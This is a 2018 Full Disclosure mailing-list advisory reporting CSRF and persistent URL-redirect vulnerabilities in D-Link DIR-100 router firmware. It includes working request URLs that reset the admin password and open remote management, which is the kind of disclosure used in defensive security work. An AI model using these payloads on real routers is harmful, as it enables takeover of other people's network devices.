Full Disclosure mailing list archives
New vulnerabilities in D-Link DIR-100
From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 31 Jan 2018 19:03:13 +0200
Hello list! There are Cross-Site Request Forgery and URL Redirector Abuse vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other versions also must be vulnerable. ---------- Details: ---------- Cross-Site Request Forgery (WASC-09): Change admin's password: http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin Turn on Remote Management: http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80 CSRF attack to change admin's password and turn on Remote Management: http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80 URL Redirector Abuse (WASC-38): http://site/Tools/vs.htm?location=http://www.google.com This is Persisted Redirector attack. After setting of an address in location parameter it saves and later on it's possible to redirect only by visiting of the page http://site/Tools/vs.htm. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/8021/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- New vulnerabilities in D-Link DIR-100 MustLive (Feb 02)
